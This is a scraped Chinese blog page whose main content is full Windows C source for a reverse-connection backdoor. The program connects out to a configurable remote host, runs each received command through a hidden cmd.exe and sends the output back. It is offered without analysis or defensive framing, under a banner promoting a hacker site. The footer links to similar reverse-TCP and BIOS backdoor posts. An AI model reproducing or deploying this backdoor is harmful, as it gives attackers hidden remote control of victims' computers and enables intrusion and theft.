反向连接后门源码

最新推荐文章于 2024-07-25 08:00:00 发布
最新推荐文章于 2024-07-25 08:00:00 发布
阅读量180 收藏
点赞数
文章标签: Socket Security .net
#include < winsock2.h >
#include < stdio.h >

#pragma comment(lib,"ws2_32.lib")

void main( int argc, char ** argv)
{
 char * messages = " ========================BackConnectBackDoorV0.1======================== =========WelcometoHttp://www.hackerxfiles.net========= " ;
WSADATAWSAData;
SOCKETsock;
SOCKADDR_INaddr_in;
 char buf1[ 1024 ]; // 作为socket接收数据的缓冲区
memset(buf1, 0 , 1024 ); // 清空缓冲区

if (WSAStartup(MAKEWORD( 2 , 0 ), & WSAData) != 0 )
{
printf( " WSAStartuperror.Error:d " ,WSAGetLastError());
 return ;
}

addr_in.sin_family = AF_INET;
addr_in.sin_port = htons( 80 ); // 反向连接的远端主机端口
addr_in.sin_addr.S_un.S_addr = inet_addr( " 127.0.0.1 " ); // 远端IP

if ((sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == INVALID_SOCKET)
{
printf( " Socketfailed.Error:d " ,WSAGetLastError());
 return ;
}
 if (WSAConnect(sock,( struct sockaddr * ) & addr_in, sizeof (addr_in),NULL,NULL,NULL,NULL) == SOCKET_ERROR) // 连接客户主机
{
printf( " Connectfailed.Error:d " ,WSAGetLastError());
 return ;
}

 if (send(sock,messages,strlen(messages), 0 ) == SOCKET_ERROR) // 发送欢迎信息
{
printf( " Sendfailed.Error:d " ,WSAGetLastError());
 return ;
}

 char buffer[ 2048 ] = { 0 }; // 管道输出的数据

for ( char cmdline[ 270 ];;memset(cmdline, 0 , sizeof (cmdline))){
SECURITY_ATTRIBUTESsa; // 创建匿名管道用于取得cmd的命令输出
HANDLEhRead,hWrite;
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
 if ( ! CreatePipe( & hRead, & hWrite, & sa, 0 ))
{
printf( " ErrorOnCreatePipe() " );
 return ;
}

STARTUPINFOsi;
PROCESS_INFORMATIONpi;
si.cb = sizeof (STARTUPINFO);
GetStartupInfo( & si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

GetSystemDirectory(cmdline,MAX_PATH + 1 );
strcat(cmdline, " \cmd.exe/c " );

 int len = recv(sock,buf1, 1024 ,NULL);
 if (len == SOCKET_ERROR)exit( 0 ); // 如果客户端断开连接,则自动退出程序
if (len <= 1 ){send(sock, " error " , sizeof ( " error " ), 0 ); continue ;}


strncat(cmdline,buf1,strlen(buf1)); // 把命令参数复制到cmdline
if ( ! CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL, & si, & pi))
{
send(sock, " Errorcommand " , sizeof ( " Errorcommand " ), 0 );
 continue ;
}

CloseHandle(hWrite);
 // 循环读取管道中数据并发送,直到管道中没有数据为止
for (DWORDbytesRead;ReadFile(hRead,buffer, 2048 , & bytesRead,NULL);memset(buffer, 0 , 2048 )){
send(sock,buffer,strlen(buffer), 0 );
}
}

}
iteye_21064
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
新版二开彩虹易支付整站源码批发 全开源全解密去后门 亲测一点问题没有
qq_49257458的博客
12-20 1298
1、环境配置 推荐系统为:Linux系统 CentOS 7.6 环境:Nginx 1.20.1+MySQL 5.6.50+PHP7.2+Redis【是php里插件,打开php-安装扩展-找到redis安装即可】 2、使用二级域名新建站点,将后端源码上传解压,运行目录为Public 、伪静态设置为Thinkphp 3、用服务器登录软件ssh或者宝塔终端登录服务器执行以下命令 sudo rpm -Uvh https://packages.microsoft.com/config/
BIOS中隐藏Telnet后门
04-12
该项目仅为实验性项目,目的是学习国外技术。该项目主要目的是想隐藏一个Telnet后门 在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连 接到指定的计算机接受CMD控制。
vc++反向连接后门
weixin_33716941的博客
05-30 74
#include&lt;winsock2.h&gt;#include&lt;stdio.h&gt;#pragma comment(lib,"ws2_32.lib")void main(int argc,char **argv){char *messages = "\r\n======================== BackConnect BackDoor V0.1 =============...
黑客技术:针对linux系统进行渗透时,使用python生成反向tcp后门_目标靶机开启反向tcp处理程序(1)
2401_84264536的博客
04-27 777
今天的文章中,我们会通过python开发反向tcp后门。接下来几篇文章中我还会继续介绍如何使用python编写其他模块的后门。现在我们将要编写三个程序块:连接,发送指令,接收输出.让我们开始吧~更多Python视频、源码、资料加群683380553免费获取之前已经叙述过,作为攻击者,我们不能直接连接受害服务器,这样可能会触发杀毒软件,或者我们会被禁止连接。但是受害机器连接到服务端,然后再发送指令,这样就可以很大几率绕过防火墙。我们第一步先初始化sockets模块,以及处理反向连接。导入相关数据包。
html后门代码/web后门代码-手把手教网安自学路线
2401_84915584的博客
05-29 209
前段时间 中的一个中间件 被爆出存在 ,关注了一波,但仅看官方npm 的解释,一时半会儿没想明白黑客是怎么留的后门,一直困扰着我。今天有空仔细看了一下
黑客技术:针对linux系统进行渗透时,使用python生成反向tcp后门
python学习者的博客
11-15 988
针对linux系统进行渗透时,我们会在相对安全的环境下进行攻击。一般我们会在目标机器上安装一些虚拟化的软件,并且针对系统安装相应的环境。为了渗透成功,我们需要在靶机上种植后门,但是现在大部分杀毒软件都会对MSF产生的后门进行查杀,所以在实战中我们需要避免使用msf这种工具产生后门。这就需要我们自己编写后门程序了,这篇文章就是讲如何编写msf中的其中一个payload:reverse_tcp模块。 ...
黑客技术:针对linux系统进行渗透时,使用python生成反向tcp后门_目标靶机开启反向tcp处理程序
2401_84264536的博客
04-27 782
更多Python视频、源码、资料加群683380553免费获取之前已经叙述过,作为攻击者,我们不能直接连接受害服务器,这样可能会触发杀毒软件,或者我们会被禁止连接。但是受害机器连接到服务端,然后再发送指令,这样就可以很大几率绕过防火墙。我们第一步先初始化sockets模块,以及处理反向连接。导入相关数据包通过sys.argv模块接收套接字端口信息设置套接字,绑定套接字,侦听套接字端口,等待连接如果有人访问,脚本会输出一串消息。脚本一直处于无限循环当中,等待发送命令,以及接收命令回显。
代码后门是什么/Express 中间件 getcookies 后门代码分析_手把手教漏洞知识点
程序员六七的博客
05-28 132
前段时间 中的一个中间件 被爆出存在 ,关注了一波,但仅看官方npm 的解释,一时半会儿没想明白黑客是怎么留的后门,一直困扰着我。今天有空仔细看了一下
常见的后门程序有哪几类_Express 中间件 getcookies 后门代码分析_入门网安入门教程
程序员三九的博客
05-28 276
前段时间 中的一个中间件 被爆出存在 ,关注了一波,但仅看官方npm 的解释,一时半会儿没想明白黑客是怎么留的后门,一直困扰着我。今天有空仔细看了一下
后门防御阅读笔记,GangSweep: Sweep out Neural Backdoors by GAN
weixin_43999137的博客
10-18 1083
论文标题:GangSweep: Sweep out Neural Backdoors by GAN 论文单位:Old Dominion University,Norfolk, VA, USA 论文作者:Liuwan Zhu,Rui Ning,Cong Wang 收录会议:ACM MULTIMEDIA 2020 开源代码:https://github.com/nicholasbennet/neural-network-backdoor-removal GangSweep:通过GAN去“扫出“神经后门(防御)
一款PHP商城可以自定义上传商品整站源码打包「无后门
03-10
"无后门"是安全性的保证,表示源码中没有预留任何恶意的隐藏通道,用户可以放心使用。 【描述解析】 "源码语言:php"确认了该商城系统的开发语言是PHP,这是一种广泛用于Web开发的服务器端脚本语言,尤其在构建动态...
【微盘】基金宝带余额宝版 已去后门,整套源码
04-14
【微盘】基金宝带余额宝版 已去后门,整套源码是一套针对金融理财领域的软件系统,主要用于基金管理和投资。该系统已经经过处理,移除了潜在的安全隐患,确保用户数据的安全性。其核心是为用户提供一个集基金交易、...
Reverse_TCP_Program:用python编写的反向TCP程序
03-22
反向TCP程序是一种网络通信工具,它允许远程主机(客户端)连接到本地主机(服务器),而不是常规的服务器等待客户端连接的模式。这种技术在渗透测试、远程控制和恶意软件活动中常见,因为它允许隐藏服务器的存在。...
2013最新版【开源】友情链接交换平台源码
12-22
4、重点:添加站长工具,添加PR真假查询\ALEXA流量查询\百度指数查询\网站反链查询\历史记录查询\网站备案查询\域名历史查询\域名Whois查询\同IP网站查询\反向链接查询\死链接检测等站长常用工具,站长工具集合站长...
.NET 中的高性能队列 Channel
学习和分享
07-25 895
.NET 中,Channel类是 .NET Core 3.0 引入的一个用于实现生产者-消费者场景的高性能队列。它属于命名空间,并提供了基于通道的通信机制,使得在不同线程或任务之间传递数据变得更加简单和高效。
qt练习控件label控件-lineEdit控件样例代码
最新发布
07-30
qt练习控件label控件-lineEdit控件样例代码
【JCR一区级】麻雀搜索算法SSA-CNN-LSTM-Attention故障诊断分类预测【含源码 5689期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Attention分类系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Attention分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Attention分类 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Attention分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Attention分类 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Attention分类
详解MATLAB Simulink通信系统建模与仿真
07-30
第1 章 MATLAB 基础与通信系统仿真 1.1 MATLAB 简介 1.2 MATLAB 程序设计 1.3 通信系统仿真 第2 章 Simulink 仿真基础 2.1 Simulink 简介 2.2 Simulink 工作环境 2.3 Simulink 仿真的基本方法 2.4 创建自己的模块库 2.5 S-函数的编写 第3 章 通信信号与系统分析 3.1 离散信号和系统 3.2 Fourier 分析 3.3 带通信号的低通等效 3.4 随机信号分析 第4 章 信道 4.1 加性高斯白噪声信道 4.2 多径衰落信道 第5 章 模拟调制 5.1 幅度调制 5.2 角度调制 第6 章 数字基带传输 6.1 概述 6.2 二进制基带信号传输 6.3 基带PAM 信号传输 6.4 带限信道的信号传输 第7 章 数字信号载波传输 7.1 概述 7.2 载波幅度调制(PAM) 7.3 载波相位调制(PSK) 7.4 正交幅度调制(QAM) 7.5 载波频率调制(FSK) 第8 章 信道编码和交织 8.1 概述 8.2 线性分组码
nginx反向代理源码
07-05
源码方面,你可以查看Nginx源码中的`ngx_http_proxy_module.c` 和相关模块文件,特别是`ngx_http_proxy_protocol_module.c` 和 `ngx_http_upstream_round_robin.c` 等,它们包含了反向代理功能的具体实现逻辑。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值